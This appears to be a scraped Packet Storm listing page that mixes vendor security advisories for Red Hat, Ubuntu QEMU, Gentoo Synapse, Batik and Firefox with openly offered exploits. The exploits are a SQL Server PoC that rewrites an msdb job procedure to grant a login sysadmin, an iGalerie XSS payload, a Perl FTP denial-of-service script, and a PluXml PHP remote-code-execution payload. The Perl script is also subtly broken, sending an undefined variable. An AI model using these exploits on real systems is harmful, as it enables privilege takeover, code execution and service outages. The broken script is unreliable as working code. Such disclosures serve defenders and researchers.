Microsoft SQL Server versions 2014 through 2022 suffers from a db_ddladmin privilege escalation vulnerability. When escalated to Microsoft as a concern, they instead opted to update their documentation to note that this is possible instead of addressing the issue.

    Title: SQL Server Privilege Escalation from db_ddladmin to sysadminProduct:                   Microsoft SQL ServerAffected Version(s):       2014,2016,2017,2019,2022Tested Version(s):         2014,2016,2017,2019,2022Risk Level:                MediumAuthor of Advisory:        Emad Al-MousaOverview:Privilege Escalation is a serious security attack that attackers seek to compromise IT infrastructure and systems. attackers will either exploit vulnerabilites or misconfiguration in the system to escalate their permissions and take over the whole system.*****************************************Vulnerability Details:By design when you install SQL Server database engine a job is created called “syspolicy_purge_history” , and this job by design will run every day. This job can be weaponized for privilege escalation attack.attacker will require to compromise a database account that is added in MSDB system database and is granted db_ddladmin role.*****************************************Proof of Concept (PoC):I will create a dummy account called “toto”  (for the sake of simulation it will be SQL Authenticated account):USE [master]GOCREATE LOGIN [toto] WITH PASSWORD=N'toto', DEFAULT_DATABASE=[master], DEFAULT_LANGUAGE=[us_english], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFFGOAnd, then I will add the account as database user in system database MSDB with db_ddladmin permission:USE [msdb]GOCREATE USER [toto] FOR LOGIN [toto]GOUSE [msdb]GOALTER ROLE [db_ddladmin] ADD MEMBER [toto]GOThen, I will execute the following modification code against the procedure:USE [msdb]GOALTER  PROCEDURE [dbo].[sp_syspolicy_purge_history]ASBEGINALTER SERVER ROLE [sysadmin] ADD MEMBER [toto]ENDThe next scheduled run-time for the job syspolicy_purge_history, the account toto will be escalated to SYSADMIN role, which means he will he/she will take over the whole SQL Server database system.-***- To protect from such attacks you will need to follow these security tips:Implement in-place auditing for privilege escalation attacks [smart auditing….don’t audit everything as auditing will impose performance overhead]Implement least privilege concept in your environment, do not grant any account extra permissions that can be weaponized for security breach.Strong Identity and account management approach should be in-place, passwords policies are important to make brute force attacks challenging.patch your environments , and follow best security practices.*****************************************References:https://databasesecurityninja.wordpress.com/2024/01/07/sql-server-privilege-escalation-from-db_ddladmin-to-sysadmin/https://learn.microsoft.com/en-us/sql/relational-databases/security/authentication-access/database-level-roles?view=sql-server-ver16

Microsoft SQL Server db_ddladmin Privilege Escalation

Red Hat Security Advisory 2024-0089-03 - An update for kpatch-patch is now available for Red Hat Enterprise Linux 8. Issues addressed include a use-after-free vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0089.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: kpatch-patch security updateAdvisory ID:        RHSA-2024:0089-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0089Issue date:         2024-01-09Revision:           03CVE Names:          CVE-2023-4622====================================================================Summary: An update for kpatch-patch is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.Security Fix(es):* kernel: use after free in unix_stream_sendpage (CVE-2023-4622)* kernel: netfilter: potential slab-out-of-bound access due to integer underflow (CVE-2023-42753)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-4622References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2237760https://bugzilla.redhat.com/show_bug.cgi?id=2239843

Red Hat Security Advisory 2024-0089-03

tc is a low-tech free software to chat anonymously and ciphered over Tor circuits in PGP. Use it to protected your communication end-to-end with RSA/DSA encryption and keep yourself anonymously reachable by anyone who only knows your .onion address and your public key. All this and more in 2400 lines of C code that compile and run on BSD and Linux systems with an IRC like GUI. As this is a rolling release and does not have an official build yet, the prior version on Packet Storm was replaced with this updated code base.

tc Tor Chat Client

Ubuntu Security Notice 6567-1 - Gaoning Pan and Xingwei Li discovered that QEMU incorrectly handled the USB xHCI controller device. A privileged guest attacker could possibly use this issue to cause QEMU to crash, leading to a denial of service. This issue only affected Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. It was discovered that QEMU incorrectly handled the TCG Accelerator. A local attacker could use this issue to cause QEMU to crash, leading to a denial of service, or possibly execute arbitrary code and escalate privileges. This issue only affected Ubuntu 20.04 LTS.

==========================================================================  
Ubuntu Security Notice USN-6567-1  
January 08, 2024

qemu vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in QEMU.

Software Description:  
- qemu: Machine emulator and virtualizer

Details:

Gaoning Pan and Xingwei Li discovered that QEMU incorrectly handled the  
USB xHCI controller device. A privileged guest attacker could possibly use  
this issue to cause QEMU to crash, leading to a denial of service. This  
issue only affected Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. (CVE-2020-14394)

It was discovered that QEMU incorrectly handled the TCG Accelerator. A  
local attacker could use this issue to cause QEMU to crash, leading to a  
denial of service, or possibly execute arbitrary code and esclate  
privileges. This issue only affected Ubuntu 20.04 LTS. (CVE-2020-24165)

It was discovered that QEMU incorrectly handled the Intel HD audio device.  
A malicious guest attacker could use this issue to cause QEMU to crash,  
leading to a denial of service. This issue only affected Ubuntu 22.04 LTS.  
(CVE-2021-3611)

It was discovered that QEMU incorrectly handled the ATI VGA device. A  
malicious guest attacker could use this issue to cause QEMU to crash,  
leading to a denial of service. This issue only affected Ubuntu 20.04 LTS.  
(CVE-2021-3638)

It was discovered that QEMU incorrectly handled the VMWare paravirtual RDMA  
device. A malicious guest attacker could use this issue to cause QEMU to  
crash, leading to a denial of service. (CVE-2023-1544)

It was discovered that QEMU incorrectly handled the 9p passthrough  
filesystem. A malicious guest attacker could possibly use this issue to  
open special files and escape the exported 9p tree. This issue only  
affected Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 23.04.  
(CVE-2023-2861)

It was discovered that QEMU incorrectly handled the virtual crypto device.  
A malicious guest attacker could use this issue to cause QEMU to crash,  
leading to a denial of service, or possibly execute arbitrary code. This  
issue only affected Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 23.04.  
(CVE-2023-3180)

It was discovered that QEMU incorrectly handled the built-in VNC server.  
A remote authenticated attacker could possibly use this issue to cause QEMU  
to stop responding, resulting in a denial of service. This issue only  
affected Ubuntu 22.04 LTS and Ubuntu 23.04. (CVE-2023-3255)

It was discovered that QEMU incorrectly handled net device hot-unplugging.  
A malicious guest attacker could use this issue to cause QEMU to crash,  
leading to a denial of service. This issue only affected Ubuntu 22.04 LTS  
and Ubuntu 23.04. (CVE-2023-3301)

It was discovered that QEMU incorrectly handled the built-in VNC server.  
A remote attacker could possibly use this issue to cause QEMU to crash,  
resulting in a denial of service. This issue only affected Ubuntu 20.04  
LTS, Ubuntu 22.04 LTS, and Ubuntu 23.04. (CVE-2023-3354)

It was discovered that QEMU incorrectly handled NVME devices. A malicious  
guest attacker could use this issue to cause QEMU to crash, leading to a  
denial of service. This issue only affected Ubuntu 23.10. (CVE-2023-40360)

It was discovered that QEMU incorrectly handled NVME devices. A malicious  
guest attacker could use this issue to cause QEMU to crash, leading to a  
denial of service, or possibly obtain sensitive information. This issue  
only affected Ubuntu 23.10. (CVE-2023-4135)

It was discovered that QEMU incorrectly handled SCSI devices. A malicious  
guest attacker could use this issue to cause QEMU to crash, leading to a  
denial of service. This issue only affected Ubuntu 23.04 and Ubuntu 23.10.  
(CVE-2023-42467)

It was discovered that QEMU incorrectly handled certain disk offsets. A  
malicious guest attacker could possibly use this issue to gain control of  
the host in certain nested virtualization scenarios. (CVE-2023-5088)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   qemu-system                     1:8.0.4+dfsg-1ubuntu3.23.10.2  
   qemu-system-arm                 1:8.0.4+dfsg-1ubuntu3.23.10.2  
   qemu-system-mips                1:8.0.4+dfsg-1ubuntu3.23.10.2  
   qemu-system-misc                1:8.0.4+dfsg-1ubuntu3.23.10.2  
   qemu-system-ppc                 1:8.0.4+dfsg-1ubuntu3.23.10.2  
   qemu-system-s390x               1:8.0.4+dfsg-1ubuntu3.23.10.2  
   qemu-system-sparc               1:8.0.4+dfsg-1ubuntu3.23.10.2  
   qemu-system-x86                 1:8.0.4+dfsg-1ubuntu3.23.10.2  
   qemu-system-x86-xen             1:8.0.4+dfsg-1ubuntu3.23.10.2  
   qemu-system-xen                 1:8.0.4+dfsg-1ubuntu3.23.10.2

Ubuntu 23.04:  
   qemu-system                     1:7.2+dfsg-5ubuntu2.4  
   qemu-system-arm                 1:7.2+dfsg-5ubuntu2.4  
   qemu-system-mips                1:7.2+dfsg-5ubuntu2.4  
   qemu-system-misc                1:7.2+dfsg-5ubuntu2.4  
   qemu-system-ppc                 1:7.2+dfsg-5ubuntu2.4  
   qemu-system-s390x               1:7.2+dfsg-5ubuntu2.4  
   qemu-system-sparc               1:7.2+dfsg-5ubuntu2.4  
   qemu-system-x86                 1:7.2+dfsg-5ubuntu2.4  
   qemu-system-x86-xen             1:7.2+dfsg-5ubuntu2.4  
   qemu-system-xen                 1:7.2+dfsg-5ubuntu2.4

Ubuntu 22.04 LTS:  
   qemu                            1:6.2+dfsg-2ubuntu6.16  
   qemu-system-arm                 1:6.2+dfsg-2ubuntu6.16  
   qemu-system-mips                1:6.2+dfsg-2ubuntu6.16  
   qemu-system-misc                1:6.2+dfsg-2ubuntu6.16  
   qemu-system-ppc                 1:6.2+dfsg-2ubuntu6.16  
   qemu-system-s390x               1:6.2+dfsg-2ubuntu6.16  
   qemu-system-sparc               1:6.2+dfsg-2ubuntu6.16  
   qemu-system-x86                 1:6.2+dfsg-2ubuntu6.16  
   qemu-system-x86-microvm         1:6.2+dfsg-2ubuntu6.16  
   qemu-system-x86-xen             1:6.2+dfsg-2ubuntu6.16

Ubuntu 20.04 LTS:  
   qemu                            1:4.2-3ubuntu6.28  
   qemu-system                     1:4.2-3ubuntu6.28  
   qemu-system-arm                 1:4.2-3ubuntu6.28  
   qemu-system-mips                1:4.2-3ubuntu6.28  
   qemu-system-misc                1:4.2-3ubuntu6.28  
   qemu-system-ppc                 1:4.2-3ubuntu6.28  
   qemu-system-s390x               1:4.2-3ubuntu6.28  
   qemu-system-sparc               1:4.2-3ubuntu6.28  
   qemu-system-x86                 1:4.2-3ubuntu6.28  
   qemu-system-x86-microvm         1:4.2-3ubuntu6.28  
   qemu-system-x86-xen             1:4.2-3ubuntu6.28

After a standard system update you need to restart all QEMU virtual  
machines to make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6567-1  
   CVE-2020-14394, CVE-2020-24165, CVE-2021-3611, CVE-2021-3638,  
   CVE-2023-1544, CVE-2023-2861, CVE-2023-3180, CVE-2023-3255,  
   CVE-2023-3301, CVE-2023-3354, CVE-2023-40360, CVE-2023-4135,  
   CVE-2023-42467, CVE-2023-5088

Package Information:  
   https://launchpad.net/ubuntu/+source/qemu/1:8.0.4+dfsg-1ubuntu3.23.10.2  
   https://launchpad.net/ubuntu/+source/qemu/1:7.2+dfsg-5ubuntu2.4  
   https://launchpad.net/ubuntu/+source/qemu/1:6.2+dfsg-2ubuntu6.16  
   https://launchpad.net/ubuntu/+source/qemu/1:4.2-3ubuntu6.28

Ubuntu Security Notice USN-6567-1

Gentoo Linux Security Advisory 202401-12 - Multiple vulnerabilities have been found in Synapse, the worst of which could result in information leaks. Versions greater than or equal to 1.96.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-12  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Synapse: Multiple Vulnerabilities  
     Date: January 07, 2024  
     Bugs: #914765, #916609  
       ID: 202401-12

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilites have been found in Synapse, the worst of which  
could result in information leaks.

Background  
==========

Synapse is a Matrix homeserver written in Python/Twisted.

Affected packages  
=================

Package         Vulnerable    Unaffected  
--------------  ------------  ------------  
net-im/synapse  < 1.96.0      >= 1.96.0

Description  
===========

Multiple vulnerabilities have been discovered in Synapse. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Synapse users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-im/synapse-1.96.0"

References  
==========

[ 1 ] CVE-2023-41335  
      https://nvd.nist.gov/vuln/detail/CVE-2023-41335  
[ 2 ] CVE-2023-42453  
      https://nvd.nist.gov/vuln/detail/CVE-2023-42453  
[ 3 ] CVE-2023-43796  
      https://nvd.nist.gov/vuln/detail/CVE-2023-43796  
[ 4 ] CVE-2023-45129  
      https://nvd.nist.gov/vuln/detail/CVE-2023-45129

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-12

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-12

iGalerie version 3.0.22 suffers from a cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: iGalerie Version: 3.0.22 - Reflected XSS # Date: 2024-7-1# Exploit Author: tmrswrr# Vendor Homepage: https://www.igalerie.org/# Version: 3.0.22# Tested on: https://softaculous.com/demos/iGalerie1 ) Go to home page and click edit > https://127.0.0.1/iGalerie/        Titre :  "><sVg/onLy=1 onLoaD=confirm(1)//2 ) Write in titre your payload , after save will be see alert button.

iGalerie 3.0.22 Cross Site Scripting

Femitter FTP Server version 1.03 remote denial of service exploit.

#!/usr/bin/perl

use Net::FTP;

# Exploit Title: Femitter FTP Server 1.03 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 08 january 2024  
# Vendor Homepage:  https://acritum.com/  
# Download to demo: https://drive.google.com/file/d/1GBFmc7tMavA9mMoZPYVlUVUe62dGjBhF/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: Femitter FTP Server 1.03  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://drive.google.com/file/d/1n_WzyNiOwHRen60en5rh56Q4AyDfVbF_/view?usp=sharing

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server does not correctly handle the amount of data or bytes of the command RETR, resulting in memory corruption.  
#When authenticating to the FTP server with a long RETR or a RETR with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $payload = "\x41\x2C\x41\x20\x42"x500;

    my $ftp = Net::FTP->new($ip, Debug => 0) or die "Could not connect: $@";

    my $sc= "A"x800;

    $ftp->login("anon","anon") or die "Failed: " . $ftp->message;

    $ftp->quot("RETR ".$c."\r\n") or die "Error: " . $ftp->message;  
    $ftp->quot("RETR ".$c."\r\n") or die "Error: " . $ftp->message;

    $ftp->quit;

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print "######################################################################\n";  
      print "#                Femitter FTP Server 1.03 - Denial of Service        #\n";  
      print "#                                                                    #\n";  
      print "#                       Coded by Fernando Mengali                    #\n";  
      print "#                                                                    #\n";  
      print "#                 e-mail: fernando.mengalli\@gmail.com                #\n";  
      print "#                                                                    #\n";  
      print "######################################################################\n";  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

Femitter FTP Server 1.03 Denial Of Service

Gentoo Linux Security Advisory 202401-11 - Multiple vulnerabilities have been found in Apache Batik, the worst of which could result in arbitrary code execution. Versions greater than or equal to 1.17 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-11  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Apache Batik: Multiple Vulnerabilities  
     Date: January 07, 2024  
     Bugs: #724534, #872689, #918088  
       ID: 202401-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in Apache Batik, the worst of  
which could result in arbitrary code execution.

Background  
==========

Apache Batik is a Java-based toolkit for applications or applets that  
want to use images in the Scalable Vector Graphics (SVG) format for  
various purposes, such as display, generation or manipulation.

Affected packages  
=================

Package         Vulnerable    Unaffected  
--------------  ------------  ------------  
dev-java/batik  < 1.17        >= 1.17

Description  
===========

Multiple vulnerabilities have been discovered in Apache Batik. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Apache Batik users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-java/batik-1.17"

References  
==========

[ 1 ] CVE-2018-8013  
      https://nvd.nist.gov/vuln/detail/CVE-2018-8013  
[ 2 ] CVE-2019-17566  
      https://nvd.nist.gov/vuln/detail/CVE-2019-17566  
[ 3 ] CVE-2020-11987  
      https://nvd.nist.gov/vuln/detail/CVE-2020-11987  
[ 4 ] CVE-2022-38398  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38398  
[ 5 ] CVE-2022-38648  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38648  
[ 6 ] CVE-2022-40146  
      https://nvd.nist.gov/vuln/detail/CVE-2022-40146  
[ 7 ] CVE-2022-41704  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41704  
[ 8 ] CVE-2022-42890  
      https://nvd.nist.gov/vuln/detail/CVE-2022-42890  
[ 9 ] CVE-2022-44729  
      https://nvd.nist.gov/vuln/detail/CVE-2022-44729  
[ 10 ] CVE-2022-44730  
      https://nvd.nist.gov/vuln/detail/CVE-2022-44730

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-11

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-11

Gentoo Linux Security Advisory 202401-10 - Multiple vulnerabilities have been found in Mozilla Firefox, the worst of which could lead to remote code execution. Versions greater than or equal to 115.6.0:esr are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-10  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Mozilla Firefox: Multiple Vulnerabilities  
     Date: January 07, 2024  
     Bugs: #908245, #914073, #918433, #920507  
       ID: 202401-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in Mozilla Firefox, the worst  
of which could lead to remote code execution.

Background  
==========

Mozilla Firefox is a popular open-source web browser from the Mozilla  
project.

Affected packages  
=================

Package                 Vulnerable     Unaffected  
----------------------  -------------  --------------  
www-client/firefox      < 115.6.0:esr  >= 115.6.0:esr  
                        < 121.0:rapid  >= 121.0:rapid  
www-client/firefox-bin  < 115.6.0:esr  >= 115.6.0:esr  
                        < 121.0:rapid  >= 121.0:rapid

Description  
===========

Multiple vulnerabilities have been discovered in Mozilla Firefox. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Mozilla Firefox ESR binary users should upgrade to the latest  
version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-115.6.0:esr"

All Mozilla Firefox ESR users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-115.6.0:esr"

All Mozilla Firefox binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-121.0:rapid"

All Mozilla Firefox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-121.0:rapid"

References  
==========

[ 1 ] CVE-2023-3482  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3482  
[ 2 ] CVE-2023-4058  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4058  
[ 3 ] CVE-2023-4579  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4579  
[ 4 ] CVE-2023-4863  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4863  
[ 5 ] CVE-2023-5129  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5129  
[ 6 ] CVE-2023-5170  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5170  
[ 7 ] CVE-2023-5172  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5172  
[ 8 ] CVE-2023-5173  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5173  
[ 9 ] CVE-2023-5175  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5175  
[ 10 ] CVE-2023-5722  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5722  
[ 11 ] CVE-2023-5723  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5723  
[ 12 ] CVE-2023-5729  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5729  
[ 13 ] CVE-2023-5731  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5731  
[ 14 ] CVE-2023-5758  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5758  
[ 15 ] CVE-2023-6135  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6135  
[ 16 ] CVE-2023-6210  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6210  
[ 17 ] CVE-2023-6211  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6211  
[ 18 ] CVE-2023-6213  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6213  
[ 19 ] CVE-2023-6856  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6856  
[ 20 ] CVE-2023-6857  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6857  
[ 21 ] CVE-2023-6858  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6858  
[ 22 ] CVE-2023-6859  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6859  
[ 23 ] CVE-2023-6860  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6860  
[ 24 ] CVE-2023-6861  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6861  
[ 25 ] CVE-2023-6862  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6862  
[ 26 ] CVE-2023-6863  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6863  
[ 27 ] CVE-2023-6864  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6864  
[ 28 ] CVE-2023-6865  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6865  
[ 29 ] CVE-2023-6866  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6866  
[ 30 ] CVE-2023-6867  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6867  
[ 31 ] CVE-2023-6868  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6868  
[ 32 ] CVE-2023-6869  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6869  
[ 33 ] CVE-2023-6870  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6870  
[ 34 ] CVE-2023-6871  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6871  
[ 35 ] CVE-2023-6872  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6872  
[ 36 ] CVE-2023-6873  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6873  
[ 37 ] CVE-2023-32205  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32205  
[ 38 ] CVE-2023-32206  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32206  
[ 39 ] CVE-2023-32207  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32207  
[ 40 ] CVE-2023-32208  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32208  
[ 41 ] CVE-2023-32209  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32209  
[ 42 ] CVE-2023-32210  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32210  
[ 43 ] CVE-2023-32211  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32211  
[ 44 ] CVE-2023-32212  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32212  
[ 45 ] CVE-2023-32213  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32213  
[ 46 ] CVE-2023-32214  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32214  
[ 47 ] CVE-2023-32215  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32215  
[ 48 ] CVE-2023-32216  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32216  
[ 49 ] CVE-2023-34414  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34414  
[ 50 ] CVE-2023-34415  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34415  
[ 51 ] CVE-2023-34416  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34416  
[ 52 ] CVE-2023-34417  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34417  
[ 53 ] CVE-2023-37203  
      https://nvd.nist.gov/vuln/detail/CVE-2023-37203  
[ 54 ] CVE-2023-37204  
      https://nvd.nist.gov/vuln/detail/CVE-2023-37204  
[ 55 ] CVE-2023-37205  
      https://nvd.nist.gov/vuln/detail/CVE-2023-37205  
[ 56 ] CVE-2023-37206  
      https://nvd.nist.gov/vuln/detail/CVE-2023-37206  
[ 57 ] CVE-2023-37209  
      https://nvd.nist.gov/vuln/detail/CVE-2023-37209  
[ 58 ] CVE-2023-37210  
      https://nvd.nist.gov/vuln/detail/CVE-2023-37210  
[ 59 ] CVE-2023-37212  
      https://nvd.nist.gov/vuln/detail/CVE-2023-37212  
[ 60 ] MFSA-2023-40  
[ 61 ] MFSA-TMP-2023-0002

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-10

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-10

PluXml Blog version 5.8.9 suffers from a remote code execution vulnerability.

    ## Exploit Title: PluXml Blog Version : 5.8.9 - Remote Code Execution (Authenticated)### Date: 2024-1-7### Exploit Author: tmrswrr### Category: Webapps### Vendor Homepage: https://pluxml.org/### Version : 5.8.9### Tested on: https://www.softaculous.com/apps/cms/PluXml1 ) After login Click Static pages > Edit > Write in content your payload : https://127.0.0.1/PluXml/core/admin/statique.php?p=001    Payload : <?php echo system('id'); ?>2 ) Save and View page Static 1 on site :https://127.0.0.1/PluXml/static1/static-1    Result: uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft)

Source

Packet Storm